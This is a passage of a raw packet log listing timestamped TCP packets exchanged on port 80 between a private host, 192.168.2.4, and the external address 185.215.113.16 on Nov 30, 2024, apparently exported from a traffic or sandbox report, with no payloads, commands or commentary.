Nov 30, 2024 04:06:43.546025991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.546128988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.546191931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.546983004 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.547096968 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.547101021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.547629118 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.547949076 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.548064947 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.548090935 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.548885107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.548912048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.548990965 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.549021006 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.549139977 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.549855947 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.549953938 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.549984932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.550344944 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.550828934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.550921917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.550976992 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.551768064 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.551882029 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.551903963 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.551975012 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.552735090 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.552836895 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.552853107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.553693056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.553818941 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.553829908 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.553934097 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.554656982 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.554764986 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.555622101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.555682898 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.556572914 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.556689024 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.557535887 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.557657003 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.558501959 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.558609962 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.559011936 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.559340954 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.559453964 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.559556961 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.559581041 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.560405970 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.560517073 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.560522079 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.560606003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.561381102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.561480045 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.561724901 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.562333107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.562459946 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.562752008 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.563018084 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.563294888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.563685894 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.692225933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.692313910 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.692317963 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.692373037 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.692667961 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.692749977 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.692780972 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.692845106 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.693625927 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.693744898 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.693772078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.693845034 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.694566011 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.694633961 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.694637060 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.694714069 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.695549011 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.695626974 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.695795059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.695868969 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.696497917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.696578026 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.696727991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.696821928 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.697448015 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.697537899 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.697551012 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.697602034 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.721209049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.721299887 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.721564054 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.721658945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.722516060 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.722609997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.723478079 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.723511934 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.723582983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.723588943 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.723782063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.724427938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.724534988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.724560976 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.724639893 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.725410938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.725508928 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.725513935 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.725745916 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.726357937 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.726453066 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.726481915 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.727160931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.727324963 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.727443933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.728280067 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.728401899 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.729244947 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.729346991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.730185986 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.730294943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.731144905 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.731273890 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.732129097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.732230902 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.733026028 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.733063936 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.733077049 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.733189106 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.733206987 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.733238935 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.734021902 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.734101057 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.734123945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.734236956 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.734997988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.735091925 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.735114098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.735188961 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.735956907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.736026049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.736052036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.736082077 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.736918926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.736995935 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.737025976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.737107992 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.737869024 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.737942934 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.737968922 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.738040924 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.738827944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.738929033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.738934040 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.739099979 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.739779949 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.739835024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.739871025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.739948034 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.740746975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.740859032 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.740886927 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.740941048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.741709948 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.741759062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.741792917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.741935968 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.742666960 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.742739916 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.742772102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.742846966 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.743648052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.743721008 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.743755102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.743827105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.744601011 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.744641066 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.744663000 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.744713068 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.745552063 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.745667934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.745697021 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.745754957 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.746506929 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.746579885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.746609926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.746716976 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.747438908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.747517109 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.747551918 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.747622967 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.748430014 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.748507023 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.748537064 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.748609066 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.749376059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.749461889 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.749491930 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.749605894 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.750334024 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.750441074 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.750446081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.750524998 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.751372099 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.751452923 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.751455069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.751610041 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.752275944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.752351999 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.752377987 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.752521038 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.753226995 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.753328085 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.753357887 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.753377914 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.754230976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.754318953 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.754352093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.754431009 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.755167007 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.755240917 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.755253077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.755330086 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.756114006 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.756201982 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.756227016 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.756320000 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.757070065 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.757143021 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.757174969 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.757244110 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.758033991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.758099079 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.758138895 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.758196115 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.758985996 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.759097099 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.759104967 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.759299040 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.759963036 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.760037899 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.760070086 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.760144949 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.760919094 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.761010885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.761015892 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.761116028 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.761853933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.761939049 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.761975050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.762042999 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.762857914 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.762938023 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.762974977 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.763046980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.763808012 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.763859987 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.763919115 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.763972044 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.764740944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.764914989 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.893735886 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.893843889 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.894382000 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.894798040 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.894936085 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.895152092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.895276070 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.896083117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.896218061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.897188902 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.897283077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.897998095 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.898128986 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.898984909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.898996115 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.906676054 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.906927109 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.922667980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.922689915 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.922965050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.923105955 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.923955917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.924098969 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.924876928 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.925046921 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.925530910 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.925857067 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.925874949 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.925947905 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.926784039 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.926899910 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.927807093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.927937031 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.928738117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.928863049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.929121971 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.929409981 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.929652929 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.929717064 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.929745913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.929841995 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.930634975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.930773020 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.931588888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.931704998 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.932534933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.932645082 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.933537960 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.933660030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.934484005 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.934536934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.935484886 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.935503006 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.935595036 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.935715914 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.936439037 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.936572075 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.937047958 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.937387943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.937503099 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.937530041 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.938339949 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.938369036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.938442945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.939301014 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.939420938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.940248966 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.940357924 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.941080093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.941255093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.941375971 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.942156076 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.942270994 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.943130970 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.943232059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.944057941 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.944183111 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.945065975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.945173979 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.946018934 CET	80	49840	185.215.113.16	192.168.2.4
